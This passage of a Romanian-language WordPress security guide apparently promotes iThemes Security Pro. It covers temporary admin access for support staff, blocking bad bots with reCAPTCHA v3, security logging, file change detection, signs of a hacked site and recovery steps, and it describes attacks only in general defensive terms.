Pentru a începe, activați Escalarea privilegiilor pe pagina principală a setărilor de securitate.

Puteți crea un utilizator nou și îl puteți numi Asistență și îi puteți da rolul de utilizator Abonat. Data viitoare când trebuie să oferiți acces temporar la site-ul dvs. web, navigați la pagina de profil a utilizatorului de asistență.

Actualizați adresa de e-mail pentru a permite persoanei de asistență externe să solicite o nouă parolă. Apoi derulați în jos până când vedeți setările de escaladă temporară a privilegiilor. Faceți clic pe comutarea Setare rol temporar și selectați Administrator. Utilizatorul va avea acum acces de administrator pentru următoarele 24 de ore.

Dacă nu au nevoie de 24 de ore complete, puteți revoca escalada de privilegii din pagina profilului utilizatorului. Dacă aveți nevoie de mai mult de 24 de ore, puteți seta numărul exact de zile de care aveți nevoie în câmpul Zile .

Încheierea

Popularitatea WordPress îl face o țintă pentru hackeri din întreaga lume. După cum am discutat, un atacator poate provoca daune prin piratarea chiar și a celui mai scăzut nivel de utilizator WordPress.

Vestea bună este că, deși nu există nicio modalitate de a preveni atacurile asupra utilizatorilor dvs. WordPress, cu puțin efort din partea noastră, putem preveni succesul atacurilor.

Secțiunea 8: Protejați-vă site-ul web de roboții răi

În această secțiune a ghidului de securitate WordPress, veți afla, ce este un bot și cum să blocați roboții răi să nu producă ravagii pe site-ul dvs. web.

Ce este un bot?

Un bot este un software care este programat pentru a efectua o listă specifică de sarcini. Dezvoltatorii creează un set de instrucțiuni pe care un robot le va urma automat, fără ca dezvoltatorul să fie nevoit să le spună să înceapă. Roboții vor efectua sarcini repetitive și banale mult mai repede decât putem.

Diversi roboți accesează cu crawlere site-ul dvs. web. Unii dintre acești roboți sunt buni și vă oferă un serviciu valoros. Alți roboți au motive mai nefaste. Să luăm un moment pentru a vorbi despre ce este un bot și despre diferitele tipuri de roboți.

Roboții Buni

Monitorizarea roboților - iThemes Sync Pro Uptime Monitoring folosește un bot pentru a monitoriza durata de funcționare a site-ului dvs. web. Botul vă verifică site-ul la fiecare 5 minute pentru a verifica dacă este încă online. Dacă site-ul dvs. este defect, robotul vă va trimite o alertă, astfel încât să vă puteți recupera site-ul online.

Roboti de audit - Auditul site-ului iThemes Sync Pro folosește un bot Google Lighthouse pentru a verifica calitatea paginilor dvs. web. Un alt exemplu excelent de bot de audit este un instrument de verificare a linkerului care vă va explora site-ul în căutare de link-uri care vă trimit către o locație care nu există.

Feeder Bots - Un exemplu excelent de bot feeder este playerul dvs. de podcast. Playerul dvs. de podcasturi utilizează un bot pentru a monitoriza fluxurile RSS ale podcasturilor la care vă abonați și vă avertizează când podcastul dvs. preferat lansează un nou episod.

Motoare de căutare - Un crawler web Google este un exemplu de robot de căutare. Acest tip de bot vă va accesa cu crawlere site-ul web în căutarea de pagini noi sau modificate și va crea un index al site-ului dvs. web. Odată ce Google sau alt motor de căutare are un index al site-ului dvs. web, aceștia vor putea să partajeze paginile dvs. cu persoanele care utilizează motorul lor de căutare.

Securitatea Bots - Cu privire la iThemes Security Pro Site - ul de scanare folosește un bot pentru a compara lista de plugin - uri instalate și teme împotriva baza noastră de date vulnerabilitate. Dacă aveți instalat un plugin sau o temă cu o vulnerabilitate cunoscută, botul va aplica automat un patch dacă este disponibil unul.

Roboții răi

Conținut Scraping Bot - Acești roboți sunt programați pentru a descărca conținutul site-ului dvs. web fără permisiunea dvs. Robotul poate duplica conținutul pe care îl va folosi pe site-ul atacatorului pentru a-și îmbunătăți SEO-ul și a fura traficul site-ului dvs.

Spamboți - Spamboții sunt enervanți. Vor ascunde comentariile dvs. cu promisiunile de a deveni milionar în timp ce lucrează de acasă, în speranța de a vă trimite vizitatorii pe site-uri web rău intenționate.

Roboții Brute Force - Roboții Brute Force parcurg internetul în căutarea autentificărilor WordPress pentru a ataca. Odată ce acești roboți ajung pe o pagină de conectare, vor încerca cea mai simplă formă de a obține acces la un site: încercând să ghicească numele de utilizator și parolele, iar și iar, până când vor avea succes.

Cum să blocați roboții răi fără a bloca roboții buni: reCAPTCHA V3

Google reCAPTCHA vă ajută să împiedicați roboții răi să se angajeze în activități abuzive pe site-ul dvs. web, cum ar fi încercarea de a intra în site-ul dvs. folosind parole compromise, postarea de spam sau chiar răzuirea conținutului dvs.

Cu toate acestea, utilizatorii legitimi vor putea să se conecteze, să facă achiziții, să vizualizeze pagini sau să creeze conturi. reCAPTCHA folosește tehnici avansate de analiză a riscurilor pentru a distinge oamenii și roboții.

Funcția Google reCAPTCHA din iThemes Security Pro vă protejează site-ul împotriva roboților răi. Acești roboți încearcă să pătrundă pe site-ul dvs. web folosind parole compromise, postând spam sau chiar răscolind conținutul. reCAPTCHA folosește tehnici avansate de analiză a riscurilor pentru a distinge oamenii și roboții.

Ce este grozav la reCAPTCHA versiunea 3 este că vă ajută să detectați traficul abuziv de bot pe site-ul dvs. web fără nicio interacțiune a utilizatorului. În loc să afișeze o provocare CAPTCHA, reCAPTCHA v3 monitorizează diferitele solicitări făcute pe site-ul dvs. și returnează un scor pentru fiecare solicitare. Scorul variază de la 0,01 la 1. Cu cât scorul returnat de reCAPTCHA este mai mare, cu atât este mai sigur că un om a făcut cererea. Cu cât acest scor redus de reCAPTCHA este mai mic, cu atât este mai încrezător că un robot a făcut cererea.

iThemes Security Pro vă permite să setați un prag de bloc folosind scorul reCAPTCHA. Google recomandă să folosiți 0.5 ca implicit. Rețineți că ați putea bloca din greșeală utilizatorii legitimi dacă setați pragul prea mare.

Puteți activa reCAPTCHA la înregistrarea utilizatorului WordPress, la resetarea parolei, la conectare și la comentarii. iThemes Security Pro vă permite să rulați scriptul Google reCAPTCHA pe toate paginile pentru a crește acuratețea botului față de scorul uman.

Încheierea

Există roboți buni și roboți răi. reCAPTCHA blochează roboții răi de pe site-ul dvs. web, fără a intra în calea roboților buni care oferă valoare.

Secțiunea 9: Jurnalele de securitate WordPress

Logarea este o parte esențială a strategiei dvs. de securitate WordPress. Înregistrarea și monitorizarea insuficiente pot duce la o întârziere în detectarea unei încălcări de securitate. Majoritatea studiilor privind încălcările arată că timpul pentru detectarea unei încălcări este de peste 200 de zile! Această perioadă de timp permite unui atacator să încalce alte sisteme, să modifice, să fure sau să distrugă mai multe date. Din aceste motive, Logarea insuficientă a aterizat pe primele 10 riscuri de securitate ale aplicațiilor web OWASP.

Jurnalele de securitate WordPress au mai multe avantaje în strategia dvs. de securitate generală.

1. Identificați și opriți comportamentul rău intenționat.
2. Activitate la fața locului care vă poate avertiza cu privire la o încălcare.
3. Evaluează cât de multă pagubă a fost făcută.
4. Ajutor la repararea unui site piratat.

Dacă site-ul dvs. este piratat, veți dori să aveți cele mai bune informații pentru a vă ajuta într-o investigație și recuperare rapidă.

Ce sunt jurnalele de securitate WordPress?

Jurnalele de securitate WordPress în iThemes Security Pro ține evidența evenimentelor importante de securitate care apar pe site-ul dvs. web. Aceste evenimente sunt importante de monitorizat pentru a indica dacă sau când are loc o încălcare a securității.

Jurnalele de securitate ale site-ului dvs. web sunt o parte vitală a oricărei strategii de securitate. Informațiile găsite în aceste înregistrări pot fi folosite pentru a bloca actorii răi, pentru a evidenția o schimbare nedorită pe site și pentru a ajuta la identificarea și corecția punctului de intrare al unui atac reușit.

Evenimente de securitate urmărite și înregistrate de iThemes Security

Iată o privire asupra evenimentelor de securitate WordPress urmărite de pluginul iThemes Security Pro.

1. WordPress Brute Force Attacks

Atacurile cu forță brută se referă la metoda de încercare și eroare utilizată pentru a descoperi nume de utilizator și parole pentru a intra pe un site web. WordPress nu urmărește nicio activitate de conectare a utilizatorului, deci nu există nimic încorporat în WordPress care să vă protejeze de un atac de forță brută. Depinde de dvs. să vă monitorizați securitatea de conectare pentru a vă proteja site-ul WordPress.

Din fericire, un atac de forță brută nu este foarte sofisticat și este destul de ușor de identificat în jurnalele dvs. Va trebui să înregistrați numele de utilizator și IP-ul care încearcă să vă autentifice și dacă autentificarea a avut succes. Dacă vedeți că un singur nume de utilizator sau un IP are încercări consecutive nereușite de conectare, este posibil să fiți sub un atac de forță brută.

După ce știi că site-ul tău este atacat, poți să-l oprești! Este important să rețineți că nu există nicio modalitate de a preveni apariția unui atac pe site-ul dvs. web. Dar, monitorizând încercările nevalide de conectare, puteți preveni succesul acestor atacuri.

iThemes Security Pro este excelent pentru a bloca băieții răi. Cu toate acestea, dacă un tip rău ar folosi numele de utilizator Bob într-un atac de forță brută, iar Bob este un utilizator real pe site, din păcate, Bob ar fi blocat împreună cu atacatorul.

Chiar dacă este minunat să oprim băieții răi să nu pătrundă pe un site, nu ne place când securitatea afectează experiența utilizatorilor reali. Am creat Magic Links pentru a permite utilizatorilor legitimi să ocolească blocarea numelui de utilizator, în timp ce atacatorul cu forță brută rămâne blocat.

2. Scanări malware

Nu numai că ar trebui să efectuați scanări malware, dar ar trebui să înregistrați și rezultatele fiecărei scanări malware în jurnalele de securitate WordPress. Unele jurnale de securitate vor înregistra doar rezultatele scanării care au găsit malware, dar acest lucru nu este suficient. Este crucial să fiți avertizat cât mai repede posibil cu privire la o încălcare a site-ului dvs. web. Cu cât îți ia mai mult timp să știi despre un hack, cu atât va face mai multe daune.

Deși se simte bine să vezi istoria unei abordări proactive a securității care dă roade, acesta este doar un bonus și nu motivul înregistrării fiecărei scanări malware.

Dacă nu vă documentați scanările programate, nu veți avea cum să știți dacă există erori de scanare. Dacă nu înregistrați scanări eșuate, vă puteți determina că site-ul dvs. este verificat zilnic pentru a detecta malware, dar, în realitate, scanarea nu reușește să se finalizeze.

Citiți postarea în centrul atenției a funcției Scanare site pentru a afla cum iThemes Security Pro vă poate proteja de prima cauză a hacks WordPress.

3. Activitatea utilizatorului

Păstrarea unei înregistrări a activității utilizatorilor în jurnalele dvs. de securitate WordPress poate fi grația dvs. de salvare după un atac reușit.

Dacă monitorizați activitatea corectă a utilizatorului, acesta vă poate ghida prin cronologia unui hack și poate afișa tot ceea ce a schimbat hackerul, de la adăugarea de noi utilizatori la adăugarea de anunțuri farmaceutice nedorite pe site-ul dvs.

iThemes Security Pro monitorizează 5 tipuri de activități ale utilizatorilor:

1. Conectare / Deconectare

Primul tip de activitate a utilizatorului conectat este atunci când utilizatorii se conectează și se deconectează de pe site-ul dvs. web și de unde. Monitorizarea timpului și locației conectărilor utilizatorului vă poate ajuta să identificați un utilizator compromis. S-a conectat acel utilizator la un moment neobișnuit sau dintr-un loc nou? Dacă da, este posibil să doriți să începeți ancheta cu ei.

2. Crearea / Înregistrarea utilizatorului

Următoarea activitate despre care ar trebui să țineți evidența este crearea utilizatorilor, în special crearea utilizatorilor Administrator. Dacă un hacker poate compromite un utilizator legitim, acesta poate crea propriul utilizator de administrator în încercarea de a fi ascuns. Vă este ușor să observați ceva ciudat cu contul dvs., dar este mult mai dificil să identificați activitățile dăunătoare asupra altui utilizator.

Monitorizarea înregistrării utilizatorilor este, de asemenea, esențială. Unele vulnerabilități permit hackerilor să schimbe rolul implicit de utilizator nou dintr-un abonat în administrator.

Dacă aveți setarea Înregistrare utilizator doar pentru a monitoriza activitatea utilizatorilor Administrator, în jurnalele de securitate va fi înregistrată numai înregistrarea utilizatorului Admin nou. Deci, dacă vedeți vreodată un utilizator nou înregistrat în jurnalele dvs. de securitate, ceva nu a funcționat corect.

3. Adăugarea și eliminarea pluginurilor

Este vital să înregistrați cine adaugă și elimină pluginuri. Odată ce site-ul dvs. a fost piratat, atacatorului îi va fi ușor să-și adauge pluginul personalizat pentru a injecta cod rău intenționat pe site.

Chiar dacă un hacker nu are acces la serverul sau baza de date, este posibil să fie în măsură să le facă modificări din tabloul de bord WordPress. Folosind un plugin, aceștia pot adăuga redirecționări către site-ul dvs. pentru a le utiliza în următoarea campanie de convertire a spamului sau pot injecta programe malware în baza de date. După executarea codului lor rău intenționat, pot șterge pluginul pentru a elimina dovezile infracțiunii lor. Din fericire pentru noi, nu vom rata nimic, deoarece totul a fost documentat în jurnalele noastre de securitate WordPress.

4. Comutarea temelor

O altă activitate a utilizatorului monitorizată de jurnalizarea utilizatorilor iThemes Security Pro este atunci când cineva schimbă tema site-ului web. Dacă descoperiți vreodată că tema dvs. s-a schimbat în mod neașteptat, puteți căuta în jurnalele de securitate WordPress pentru a afla cine a făcut modificarea.

5. Modificări la Postări și pagini

În cele din urmă, doriți să monitorizați orice modificare a postării și a paginilor dvs. Au fost adăugate linkuri pentru a vă trimite traficul către alte site-uri? Monitorizarea postărilor și a paginilor vă poate ajuta să găsiți orice pagini jenante sau linkuri rău intenționate adăugate la site-ul dvs. web după o încălcare.

Pentru a afla ce postare a fost modificată, faceți clic pe linkurile Afișați detalii pentru a găsi ID-ul postării.

Consultați postarea în centrul atenției a funcției Înregistrare utilizator pentru a afla mai multe despre modul în care monitorizarea activității utilizatorilor vă poate ajuta să reveniți dintr-un hack.

Încheierea

Logarea insuficientă este unul dintre primele 10 riscuri de securitate ale aplicației web OWASP. Monitorizarea comportamentului corect vă va ajuta să identificați și să opriți atacurile, să detectați o încălcare și să accesați și să reparați daunele produse site-ului dvs. web după un atac reușit.

Secțiunea 10: Când apare un dezastru de securitate WordPress

Chiar dacă urmați cele mai bune practici de securitate WordPress, există încă șanse ca site-ul dvs. să fie compromis. Un compromis înseamnă că un hacker a încălcat site-ul dvs. web și l-a infectat cu malware.

Ce este o încălcare a securității?

O încălcare a securității este atunci când un criminal cibernetic poate obține acces neautorizat la site-ul sau serverul dvs. Încălcările de securitate se pot întâmpla în mai multe moduri diferite, deoarece hackerii exploatează unele dintre cele mai frecvente probleme de securitate WordPress. De la rularea versiunilor învechite de pluginuri și teme la injecții SQL mai complicate, o breșă de securitate se poate întâmpla chiar și celor mai vigilenți proprietari de site-uri.

Este timpul să detectăm o încălcare a securității: un factor cheie în curățarea unui site web infectat

Știați că timpul mediu pentru a descoperi o încălcare a site-ului web este de 200 de zile? Din păcate, cu cât îți ia mai mult timp pentru a observa o încălcare, cu atât un hacker poate face mai multe daune site-ului tău web, clienților tăi și dvs. Un malware poate provoca daune uimitoare în 200 de zile. De aceea, este atât de important să reduceți timpul necesar pentru a detecta o încălcare a securității.

De ce? Curățarea și timpul de nefuncționare de care veți avea nevoie pentru a vă curăța site-ul după 200 de zile în valoare de daune sunt, de asemenea, uluitoare. Timpul pentru a investiga tot ceea ce malware-ul a atins și datele despre clienți care au fost furate crește doar în timp ce încălcarea rămâne nedetectată. Ca să nu mai vorbim de timpul pe care va trebui să-l petreceți informând clienții că trebuie să își anuleze cardurile de credit, deoarece un hacker a înregistrat toate apăsările de taste în timp ce vă vizitau site-ul web.

Costul de a fi hacked este mare. Trebuie să plătiți pe cineva pentru a investiga încălcarea și pentru a vă curăța site-ul web. Specialistul în reparații de hack-uri va trebui să vă elimine site-ul web în timp ce funcționează, iar oamenii nu vor putea face achiziții noi în timp ce site-ul dvs. nu funcționează. După ce ați pierdut încrederea clienților dvs., veți pierde probabil orice cumpărături viitoare pe care vi le-ar fi oferit.

Costul unui hack este motivul pentru care este crucial să observați o încălcare cât mai curând posibil. Cu cât descoperiți mai repede încălcarea, cu atât mai repede puteți opri orice daună ulterioară și cu atât mai repede vă puteți recupera site-ul și afacerea online.

Sunt suficiente scanerele malware?

Scannerele malware oferă o modalitate de a scana site-ul dvs. WordPress pentru fișiere și scripturi rău intenționate cunoscute. Dar sunt suficiente scanerele malware pentru a detecta o încălcare a securității?

Într-un cuvânt, nu. Nu credeți că vă puteți baza numai pe un scaner malware pentru a verifica dacă site-ul dvs. web este infectat. Niciun scaner de malware nu poate identifica fiecare malware care există. Dacă întâlniți un scaner malware care susține că este 100% precis, ar trebui să rulați, deoarece scanările care fac astfel de afirmații sunt adesea cele mai puțin precise.

Semnătura vs. Detectarea malware-ului comportamental

Majoritatea scanărilor malware și a software-urilor antivirus utilizează semnături malware pentru a detecta malware. Scanările malware mai avansate vor utiliza o combinație de detectare a semnăturilor și analiză comportamentală.

Semnături malware

O semnătură malware este o serie de octeți care sunt folosiți pentru a identifica piesele malware cunoscute. Unele scanere malware sunt alimentate de o bază de date umplută cu semnăturile malware a milioane de viruși cunoscuți.

Scanarea programelor malware bazate pe semnături este rapidă, simplă și va detecta 100% din componentele malware cunoscute și bine înțelese. Toate acestea sunt grozave și vor prinde malware adăugat de hackeri de nivel scăzut.

Cu toate acestea, hackerii calificați știu că scanerele malware verifică semnăturile unor malware cunoscute. Acești hackeri au capacitatea de a ascunde semnăturile malware pentru a rămâne nedetectate de scanerul dvs. mediu.

Noile programe malware sunt lansate într-un ritm în care scanerele de programe malware nu își pot actualiza baza de date cu toate cele mai recente semnături. Deci, un scaner bazat pe semnături nu va putea face diferența dintre un nou bit de malware și fișierul readme.txt al unui plugin.

Analiza comportamentală

Analiza comportamentală verifică acțiunile unui software pentru a determina dacă este rău intenționat. Există o mulțime de diferite tipuri de comportamente care pot fi considerate suspecte sau rău intenționate. De exemplu, iThemes Security Pro Site Scan folosește API-ul Google Safe Browsing pentru a vă menține site-urile în siguranță. Navigarea sigură Google va verifica dacă un software redirecționează traficul către un site rău intenționat cunoscut.

Din nou, nu există o metodă infailabilă de detectare a malware-ului. Dar o combinație de verificări de comportament și semnături vă va crește semnificativ șansele de a fi avertizat cu privire la dovezile unei încălcări a securității.

Ce comportament partajează toate programele malware?

Știm cât de crucial este să detectăm o încălcare a securității cât mai curând posibil și că nu ne bazăm doar pe detectarea malware-ului. Deci, ne-am întrebat cum iThemes Security Pro ar putea reduce timpul necesar oamenilor pentru a detecta încălcări de securitate pe site-urile lor web?

În timp ce tipul de daune cauzate de malware pe site-ul dvs. web variază foarte mult, ceea ce face poate fi redus la unul sau la o combinație a următoarelor trei lucruri.

1. Adăugați fișiere - programele malware sub formă de programe spion pot adăuga un fișier rău intenționat care va înregistra tastele clientului dvs. pe măsură ce introduc informațiile cardului de credit.
2. Eliminare fișiere - Unele programe malware vor elimina un fișier legitim și îl vor înlocui cu un fișier rău intenționat cu același nume.
3. Modificare fișiere - Programele malware vor încerca să ascundă codul său rău intenționat ascunzându-l într-un fișier existent pe care îl modifică.

Nu ar fi frumos să fii alertat de modificările neașteptate ale site-ului tău, astfel încât să le poți inspecta pentru semne de încălcare a securității?

Cum să reduceți timpul necesar pentru a detecta o încălcare a securității

Cheia pentru identificarea rapidă a unei încălcări de securitate este monitorizarea modificărilor fișierelor de pe site-ul dvs. web.

Funcția de detectare a modificărilor de fișiere din iThemes Security Pro va scana fișierele site-ului dvs. web și vă va avertiza când apar modificări pe site-ul dvs. web.

Există mai multe motive legitime pentru care ați vedea o nouă activitate de modificare a fișierelor în jurnalele dvs., dar dacă modificările făcute ar fi neașteptate, ar trebui să vă alocați timp pentru a vă asigura că modificările nu au fost dăunătoare. De exemplu, dacă vedeți o modificare făcută unui plugin la aceeași dată și oră în care ați actualizat pluginul, nu ar exista niciun motiv pentru a investiga.

Cum se activează detectarea modificărilor de fișiere în iThemes Security Pro

Pentru a începe monitorizarea modificărilor de fișiere, activați Detectarea modificărilor de fișiere pe pagina principală a setărilor de securitate.

Odată activată opțiunea Detectarea modificărilor de fișiere, iThemes Security Pro va începe să scaneze în bucăți toate fișierele site-ului dvs. web. Scanarea fișierelor în bucăți va ajuta la reducerea resurselor necesare pentru a monitoriza modificările fișierului.

Scanarea inițială a modificării fișierului va crea un index al fișierelor site-ului dvs. web și a hash-urilor acestora. Un hash de fișier este o versiune scurtată, care nu poate fi citită de om, a conținutului fișierului.

După finalizarea scanării inițiale, iThemes Security Pro va continua să vă scaneze fișierul în bucăți. Dacă un hash de fișier se modifică la una dintre scanările ulterioare, înseamnă că conținutul fișierului s-a modificat.

De asemenea, puteți rula o modificare manuală a fișierului făcând clic pe butonul Scanare fișiere acum din setările Detectare modificări fișiere

Activarea e-mailurilor de notificare a modificării fișierelor

Modificările fișierelor au loc tot timpul și primirea unei alerte prin e-mail pentru fiecare modificare ar deveni rapid copleșitoare. Și înainte să știți, devine un băiat care a plâns de situația lupului și începeți să ignorați complet alertele de modificare a fișierelor.

Să aruncăm o privire asupra modului în care iThemes Security Pro identifică în mod inteligent modificările legitimate pentru a reduce notificările și cum puteți dezactiva notificările pentru fișierele care se așteaptă să se actualizeze frecvent.

Puteți gestiona toate notificările iThemes Security din Centrul de notificări din pluginul iThemes Security. Din tabloul de bord al administratorului WordPress, accesați Securitate> Setări și localizați modulul Centrul de notificări .

Modul în care iThemes Security Pro identifică modificările legitime ale fișierelor

Există câteva modalități prin care iThemes Security Pro poate detecta dacă o modificare adusă unui fișier a fost legitimă și nu a fost un motiv de îngrijorare. iThemes Security Pro nu va crea o notificare de modificare a fișierelor pentru modificările pe care le poate verifica.

1. Actualizări de pluginuri / teme finalizate de gestionarea versiunilor

Funcția de gestionare a versiunilor din iThemes Security Pro vă permite să actualizați automat WordPress, pluginuri și teme.

Dacă o actualizare este finalizată de gestionarea versiunilor, iThemes Security Pro va cunoaște sursa actualizării și nu va declanșa o alertă.

2. Compararea fișierelor pentru pluginuri și teme iThemes

Bifați caseta Comparare fișiere online din setările Detectare modificări fișiere pentru a activa compararea fișierelor online.

De fiecare dată când un fișier de pe site-ul dvs. web aparținând unui plugin sau temă iThemes este schimbat, acesta va fi comparat cu un fișier de pe serverul iThemes. Dacă hash-ul versiunii fișierului de pe site-ul dvs. web se potrivește cu hash-ul versiunii de pe serverul iThemes, va fi o modificare legitimă și nu veți primi o alertă.

3. Comparație de fișiere online WordPress.org

Dacă un fișier de bază WordPress sau un plugin instalat din depozitul WordPress.org este schimbat, fișierul va fi comparat cu versiunea de pe WordPress.org. Dacă hashurile se potrivesc, modificările nu sunt rău intenționate și nu veți primi o alertă.

4. Excluderi manuale

Puteți exclude fișiere, directoare și tipuri de fișiere din Detectarea modificărilor de fișiere din setările Detectare modificări de fișiere.

Regula generală este că este în regulă să excludeți fișierele despre care știți că vor fi actualizate periodic. Copiile de rezervă și fișierele cache sunt un exemplu perfect în acest sens. Excluderea acestor tipuri de fișiere va calma o mulțime de zgomot suplimentar.

7 Semne Site-ul dvs. WordPress a fost piratat

Găsindu-te întrebați: „ Este piratat site-ul meu WordPress? ”Înseamnă că veți dori câteva răspunsuri rapide.

Cu cât observați mai repede semnele unei încălcări a site-ului web, cu atât mai rapid puteți curăța site-ul dvs. Cu cât vă puteți curăța site-ul web mai repede, cu atât mai puține daune pot afecta site-ul dvs.

1. Pagina dvs. de pornire este diferită

Modificările aduse paginii dvs. de pornire par a fi un semn evident. Dar de câte ori efectuați o verificare amănunțită sau pagina dvs. de pornire? Știu că merg de obicei direct la adresa URL de conectare și nu la adresa URL de acasă. De acolo, mă autentific, îmi actualizez site-ul sau modific o postare. După ce termin ce am făcut, plec adesea fără să mă uit la pagina de pornire a site-ului meu.

Scopul principal al unor hack-uri este de a trola un site web sau de a câștiga notorietate. Așadar, îți schimbă pagina de pornire doar cu ceva ce li se pare amuzant sau să lase un card de vizită piratat .

Dacă observați o modificare a paginii dvs. de pornire, vă puteți restaura site-ul web rapid și ușor utilizând un fișier de rezervă realizat cu un plugin de rezervă WordPress de încredere, cum ar fi BackupBuddy.

2. Performanța site-ului dvs. web a scăzut

Site-ul dvs. se poate simți lent atunci când are o infecție. Puteți experimenta încetiniri pe site-ul dvs. dacă vă confruntați cu atacuri de forță brută sau dacă există un script rău intenționat care utilizează resursele serverului dvs. pentru extragerea criptomonedelor. În mod similar, un DDoS (sau atac de refuz de serviciu ) are loc atunci când o rețea de adrese IP trimite simultan cereri către site-ul dvs. web, în ​​încercarea de a provoca blocarea acestuia.

3. Site-ul dvs. web conține anunțuri pop-up rău intenționate sau spam

Există mari șanse ca un hacker să vă compromită site-ul web dacă vizitatorii dvs. văd ferestre pop-up care îi redirecționează către un site web rău intenționat. Scopul acestui tip de atac este de a îndepărta traficul de pe site-ul dvs. către site-ul atacatorului, astfel încât aceștia să poată viza utilizatori cu fraude de clic pentru publicitate Pay Per Click.

Cel mai frustrant lucru despre acest tip de hack este că este posibil să nu puteți vedea ferestrele pop-up. Un hack pop-up poate fi conceput pentru a nu se afișa pentru utilizatorii conectați, ceea ce scade șansele ca proprietarii de site-uri web să le vadă. Deci, chiar și atunci când proprietarul site-ului se deconectează, ferestrele popup nu se vor afișa niciodată.

Vizualizarea pop-up-urilor poate fi limitată, de asemenea, dacă utilizați o extensie de blocare a anunțurilor în browser. De exemplu, un client a raportat un hack pop-up și a partajat capturi de ecran și un videoclip cu popup-urile. După ce am petrecut ore întregi trecând prin site-ul lor web, nu am reușit să recreez nimic din ceea ce raportau. Am fost convins că computerul lor personal a fost spart și nu site-ul web.

În cele din urmă, mi-am dat seama de ce nu am putut vedea ferestrele pop-up. Instalasem o extensie adblocker în browserul meu. De îndată ce am dezactivat extensia de blocare a anunțurilor, am putut vedea ferestre pop-up peste tot. Îți împărtășesc această poveste jenantă pentru a te salva de la aceeași greșeală, sperăm.

4. Observați o scădere a traficului pe site

Dacă vă conectați la contul Google Analytics și observați o scădere accentuată a traficului site-ului, site-ul dvs. WordPress ar putea fi piratat. O scădere a traficului pe site merită o anchetă. S-ar putea să existe un script rău intenționat pe site-ul dvs. care să redirecționeze vizitatorii departe de site-ul dvs. sau Google ar putea deja prin listarea neagră a site-ului dvs. ca site rău intenționat.

Primul lucru pe care doriți să îl căutați este traficul de ieșire al site-ului dvs. web. Urmărind site-ul dvs. web cu Google Analytics, va trebui să vă configurați site-ul pentru a urmări traficul care iese din site-ul dvs. Cel mai simplu mod de a monitoriza traficul de ieșire de pe site-ul dvs. WordPress este să utilizați un plugin WordPress Google Analytics.

6. Utilizatori noi neașteptați

Dacă site-ul dvs. web are înregistrări neașteptate de noi utilizatori administratori, acesta este un alt semn că site-ul dvs. WordPress a fost piratat. Prin exploatarea unui utilizator compromis, un atacator poate crea un nou utilizator admin. Cu noile lor privilegii de administrator, hackerul este gata să provoace pagube majore site-ului dvs.

Vă amintiți pluginul WP GDPR Compliance de mai devreme? În noiembrie 2018, am avut mai multe rapoarte despre crearea de noi utilizatori de administrare pe site-urile clienților. Hackerii au folosit o vulnerabilitate în pluginul WP GDPR Compliance (vulnerabilitate corecționată în versiunea 1.4.3) pentru a crea noi utilizatori de administrare pe site-urile WordPress care rulează pluginul. Exploatarea pluginului a permis utilizatorilor neautorizați să modifice înregistrarea utilizatorului pentru a schimba rolul implicit de utilizator nou de la un abonat la un administrator. Din păcate, aceasta nu a fost singura vulnerabilitate și nu puteți elimina doar noii utilizatori pe care i-a creat atacatorul și corelați pluginul.

Dacă ați instalat conformitatea WP GDPR și WooCommerce, site-ul dvs. ar fi putut fi injectat cu cod rău intenționat. Atacatorii ar putea folosi instalatorul de fundal al pluginului WooCommerce pentru a insera un program de instalare backdoor în baza de date. Dacă site-ul dvs. are o ușă din spate instalată, trebuie să contactați un specialist în reparații hack. O altă opțiune este să utilizați un fișier de rezervă pentru a reveni la o copie a site-ului dvs. web înainte de încălcare, utilizând o copie de rezervă anterioară.

7. Utilizatorii de administratori au fost eliminați

Dacă nu vă puteți conecta la site-ul dvs. WordPress, chiar și după o resetare a parolei, poate fi un semn grav de infecție.

Când repertoriul Gentoo Github a fost spart, primul lucru pe care l-a făcut atacatorul a fost să șteargă toți utilizatorii de administrare. Deci, cum a ajuns acest hacker chiar în contul lor Github? Parola unui utilizator de administrator Gentoo a fost descoperită pe un alt site. Bănuiesc că numele de utilizator și parola au fost descoperite fie prin răzuire, fie printr-o depozitare a bazei de date.

Chiar dacă parola administratorului pentru contul Gentoo Github era diferită de cea utilizată în contul compromis, era foarte similară. Deci, ar fi ca și cum aș folosi iAmAwesome2020 ca parolă pe un cont și iAmAwesome2021 pe alt site. Așadar, hackerii au reușit să descopere parola cu puțin efort. După cum putem vedea, ar trebui să utilizați o parolă unică pentru fiecare cont. O simplă variantă a parolelor nu este suficientă. Folosind LastPass, puteți genera și stoca în siguranță parole puternice, unice pentru fiecare site.

Cum să te întorci de la dezastru

Dacă bănuiți că s-a întâmplat o încălcare, există câțiva pași rapizi pe care îi puteți lua pentru a atenua daunele.

Restabiliți la o copie de rezervă anterioară / curată a site-ului dvs.

Cel mai sigur mod de a anula o încălcare a securității este să restaurați site-ul dvs. la o versiune anterioară, înainte de atac. De aceea, este atât de important să aveți la dispoziție o soluție completă de backup WordPress. Vă recomandăm să utilizați BackupBuddy pentru a programa copiile de rezervă pentru a rula automat, astfel încât să aveți întotdeauna o copie de rezervă.

Rețineți că restaurarea unei copii de rezervă anterioare poate lăsa site-ul dvs. vulnerabil la aceeași încălcare, deci este important să urmați și acești pași.

Actualizați imediat toate pluginurile și temele învechite imediat

Un plugin sau o temă vulnerabilă poate fi în continuare vinovatul, deci este important să actualizați IMEDIAT toate pluginurile sau temele învechite. Chiar dacă restaurați la o versiune curată anterioară a site-ului dvs. web, aceleași vulnerabilități vor exista în continuare și vor putea fi sparte din nou.

De asemenea, vă recomandăm să verificați dacă nu rulați un plugin sau o temă vulnerabilă care încă nu are un patch de la dezvoltator. Va trebui să eliminați imediat acest plugin.

Activați autentificarea cu doi factori

Dacă nu utilizați autentificare cu doi factori pentru a asigura autentificarea administratorilor, activați-o imediat. Acest strat de securitate adăugat vă va asigura că utilizatorii neautorizați nu pot hack orice conturi de administrator.

Căutați ajutor pentru eliminarea profesională a programelor malware

Încălcările de securitate WordPress apar la nivel de server (mai adânc decât instalarea dvs. WordPress), deci poate fi necesar să contactați un serviciu profesional de eliminare a malware-ului. Vă recomandăm WeWatchYourWebsite pentru eliminarea malware-ului profesional.

Încheiere: Ghidul de securitate WordPress

În acest ghid de securitate WordPress, am acoperit MULTE! Dar, urmând sfaturile din acest ghid, veți bloca aproape 100% din atacurile percepute pe site-ul dvs. web.

Un plugin de securitate WordPress vă poate ajuta să vă securizați site-ul WordPress

